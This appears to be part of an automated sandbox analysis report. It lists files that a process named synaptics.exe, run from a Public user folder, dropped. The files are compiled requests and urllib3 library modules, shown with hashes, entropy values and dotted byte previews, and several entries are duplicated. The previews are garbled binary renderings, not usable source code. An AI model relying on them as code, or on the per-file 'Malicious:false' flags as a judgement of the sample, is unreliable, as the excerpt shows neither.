                                                                                                                                                                                                                                  SSDEEP:96:KIrpcxB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:frp5xIlv/JPr6OgH2Qh
                                                                                                                                                                                                                                  MD5:118E7782AF7E1A08F7DB6705EF0494FA
                                                                                                                                                                                                                                  SHA1:770FDE336AED9A3E4E0888E96D06F41D69BEEC77
                                                                                                                                                                                                                                  SHA-256:89A7031FFDE9E6E6DD478BFA269C775D877395F1EC0BCEF527AEA08B77B5FB3E
                                                                                                                                                                                                                                  SHA-512:198193DFAB7167D984B350F56C0A83052EDA804F8FCD8CB363B1F0CAD621BD0C157ED4E3F76D8382922F6B27BD945394F6BCF066E16CC5CA503F8E1356CEA515
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):960
                                                                                                                                                                                                                                  Entropy (8bit):5.234174825210461
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:tgSx1qlJ5pMUqTDP/+/kv1mY+qnvWZ3b1e7N:tuRyDPGwcYxS3bUx
                                                                                                                                                                                                                                  MD5:052409E9297D4EDED2D1EDDB9365EFF2
                                                                                                                                                                                                                                  SHA1:20FB9478028DBBCFF99DA71B0020F76E59BCA485
                                                                                                                                                                                                                                  SHA-256:6211169A545A5CC8ABF8AC850192C552C1EA305DE4E4A559D39CD4E16F8D9A10
                                                                                                                                                                                                                                  SHA-512:4C4CAC51BDBE0F24E37FB44572BAAAC5726D51510FEE2651F101AB2178D4AE187D57F8AF670F6686795CE48CB7A66A3C7CBC3B6A998B2B77C4DE92E7A8E372CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....>C:\Users\Public\M20EKMMEH2\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24182
                                                                                                                                                                                                                                  Entropy (8bit):5.464222528628289
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+34sgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:+3a6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                                                  MD5:4B26C42F9D59D6A663601B2E161A1AC4
                                                                                                                                                                                                                                  SHA1:04442482D055BAA76C119287223541672D5FCC65
                                                                                                                                                                                                                                  SHA-256:73409EFEE1A019889F4ED51A7C3667B12CCB271A7C69F881EF67D3B52FF1D918
                                                                                                                                                                                                                                  SHA-512:BCB8FCD5BBAF48E0C623F733432C0A8ADC4EACEC0EB84B95BD76AAEA0B42E2914E17CF215410EB0821509B929AC44FF3A7378D12480CF358FB5FFAEFF604AB15
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24182
                                                                                                                                                                                                                                  Entropy (8bit):5.464222528628289
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+34sgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:+3a6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                                                  MD5:4B26C42F9D59D6A663601B2E161A1AC4
                                                                                                                                                                                                                                  SHA1:04442482D055BAA76C119287223541672D5FCC65
                                                                                                                                                                                                                                  SHA-256:73409EFEE1A019889F4ED51A7C3667B12CCB271A7C69F881EF67D3B52FF1D918
                                                                                                                                                                                                                                  SHA-512:BCB8FCD5BBAF48E0C623F733432C0A8ADC4EACEC0EB84B95BD76AAEA0B42E2914E17CF215410EB0821509B929AC44FF3A7378D12480CF358FB5FFAEFF604AB15
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):597
                                                                                                                                                                                                                                  Entropy (8bit):5.475608911357495
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CAcGzQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGmu+bRhCUV/X:tdwnq+sHIztRERi/uAfz3pmu+1hCmX
                                                                                                                                                                                                                                  MD5:AAC5E638B6EBCBA678F755CFAAB18E14
                                                                                                                                                                                                                                  SHA1:AE6F12EE4B422FD9994F0BAA0CD800CFB2352D7C
                                                                                                                                                                                                                                  SHA-256:434B541FF1271CE41762DBCCCD091641FBBE2949D1A2880890E9953863F300B4
                                                                                                                                                                                                                                  SHA-512:7FD628A3891CF0B55DD477D0896BC13C2C7A823A7EE026C234BCEF57C8D7EA4F7C252747D1A6857BFD7E7ACF02A30AF3222B4A1E4E0AD0A5DE90F2D0AE2FDA07
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19690
                                                                                                                                                                                                                                  Entropy (8bit):5.466866389317107
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rKLx6rqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:OFKGFHRjW2c/n8b
                                                                                                                                                                                                                                  MD5:4596DAF13DDC42B31C0B7F0F05A32FD5
                                                                                                                                                                                                                                  SHA1:AEB24E879139AFFAEFC7271664317DDC2E2CEF54
                                                                                                                                                                                                                                  SHA-256:07940411DC666E608199444AD5ABF4E05E82C310CB2AB8B3EFB7EFA13FB91816
                                                                                                                                                                                                                                  SHA-512:65422FCD860998EB85B725F727A1AECFE521A0491C44DDC550A8046B33C064D620F9897B4BA277CE53E2C903755071B307F4CB033E95F07989C2C878CEA895C9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4710
                                                                                                                                                                                                                                  Entropy (8bit):5.73913685517168
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:m+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeM8y2F4K1r7w:mWn3WKfr/piTNg+evFs
                                                                                                                                                                                                                                  MD5:1324D1B1AC6D41615514915BAEC82025
                                                                                                                                                                                                                                  SHA1:2588C007AEC22D9673A81753F1511FDE4BEAFD80
                                                                                                                                                                                                                                  SHA-256:636A2381A0DC083154DE86D2D6EE6B6496119CBB22C12A9BDF1ADF9B45B82BE7
                                                                                                                                                                                                                                  SHA-512:CEC9D9A2DCB67F75AFC45AD747C86ABE417FEBD0CAA448504F1661716EF452C0CA2A3031F0AC1ED3712D52AFAB13E831309E8E8CDF84859932086EF20DF60B04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4404
                                                                                                                                                                                                                                  Entropy (8bit):5.100155341217687
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:2VEvJgabXXYF+hwKMGZG3h+VLTovFx0qjax7evl:2UJrbXX8wtEhL39
                                                                                                                                                                                                                                  MD5:191CE3541373DF4524C5FEB39D8D0EC9
                                                                                                                                                                                                                                  SHA1:2E168C18C89051B03E51ABBA775B35E1F11DD447
                                                                                                                                                                                                                                  SHA-256:76997314CE25BA7359AC0363B59D9D6841C111D19147EDFABE98BAF8965CD834
                                                                                                                                                                                                                                  SHA-512:54491BA1B496E551AAA52D75555A6BF63CE28E2F00425ADBB903EAFA29CC5BE7CAB07558458B962AB635CC5D3B9A3B76F894A3DF8DE4455F4679EFD4AFE85499
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24592
                                                                                                                                                                                                                                  Entropy (8bit):5.589541959365256
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:dwAXYuSd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:de/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                                                  MD5:B6C33FF0107FDEFBA1BB9B39EF843ABE
                                                                                                                                                                                                                                  SHA1:4BA19B8206C5A6ACAB071E5A2045CA3C424DFB53
                                                                                                                                                                                                                                  SHA-256:F75569ED98436F5CA494097148F495E4023455F8002DCC03943FDEBD56DA830A
                                                                                                                                                                                                                                  SHA-512:3A24C8C8872139868336A1E45CF9BAC8E8EE3F5E296E16804875748D42F475D9AA23B8E3D618C0E6DD98FF08DDCBF5530FC7A13CB19B8FB8D9F25D52C91411F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24592
                                                                                                                                                                                                                                  Entropy (8bit):5.589541959365256
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:dwAXYuSd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:de/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                                                                  MD5:B6C33FF0107FDEFBA1BB9B39EF843ABE
                                                                                                                                                                                                                                  SHA1:4BA19B8206C5A6ACAB071E5A2045CA3C424DFB53
                                                                                                                                                                                                                                  SHA-256:F75569ED98436F5CA494097148F495E4023455F8002DCC03943FDEBD56DA830A
                                                                                                                                                                                                                                  SHA-512:3A24C8C8872139868336A1E45CF9BAC8E8EE3F5E296E16804875748D42F475D9AA23B8E3D618C0E6DD98FF08DDCBF5530FC7A13CB19B8FB8D9F25D52C91411F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6092
                                                                                                                                                                                                                                  Entropy (8bit):5.511514085656575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:h/KVMbgcD9Q0jnBw/lM2oAHVKR2hSRlcLJCuhvPFor70SSD4BPa/vpy6GzbDZrH:4VIgchjjneTECFCuh8aDiPwQRrH
                                                                                                                                                                                                                                  MD5:C0C5583B2FFAAEE8BD38B4CC466F036A
                                                                                                                                                                                                                                  SHA1:36272C93737D953561C9FCFA34D81288492F364E
                                                                                                                                                                                                                                  SHA-256:066C49B4C53F478B4EB37E531589DCD5C0AB08BEF003323C12A126019E003455
                                                                                                                                                                                                                                  SHA-512:18F83F408EAF115C08E2D7158BF041807C122F7362AAA2BAB213F694D55EFEDDFAF22733A9E87B93EBB411B07FDFC0020915A160B79C2BA830B7778DD22BCBDC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5667
                                                                                                                                                                                                                                  Entropy (8bit):5.12214502092679
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:+c/rl7d/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:7zl7d/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                                                                  MD5:8B25A03CC2D06453266A15466C3BDF91
                                                                                                                                                                                                                                  SHA1:BF2456998D810F597A31D758E8216BDDA6FBB37B
                                                                                                                                                                                                                                  SHA-256:E69ACCDAFDFC593AF8F0157DAC27FC164EDFC8A599887A61C02C558F777C900C
                                                                                                                                                                                                                                  SHA-512:CCDCBDDD9005DB71C615620B192BC7137FC0A1362DF368B778B8614585773AB10F45A7D2FFF93B00810949145C043DDE60A5A4BA77E149B5935B80E9B981EED9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r....r........s.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16233
                                                                                                                                                                                                                                  Entropy (8bit):5.258505785289059
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:F1FpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:raf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                                                                  MD5:6778498A07ED2FD74DA87F36A446286F
                                                                                                                                                                                                                                  SHA1:292D8FD54CFA4433FB8D14165400C14793BD0792
                                                                                                                                                                                                                                  SHA-256:0B18F81CB9CA24E685BFC3342868F1140EE3019C0D264ABE20497C721A60C00E
                                                                                                                                                                                                                                  SHA-512:39D02E364F923EA26C6BD9AD2B1A3BC0A037175BAE6B1F47602429D8D427B3D20846F4D487C2E4BCDBEF8799F68C6A73CA8F03FF340EC3BFEB495F6A6078E54E
                                                                                                                                                                                                                                  Malicious:false
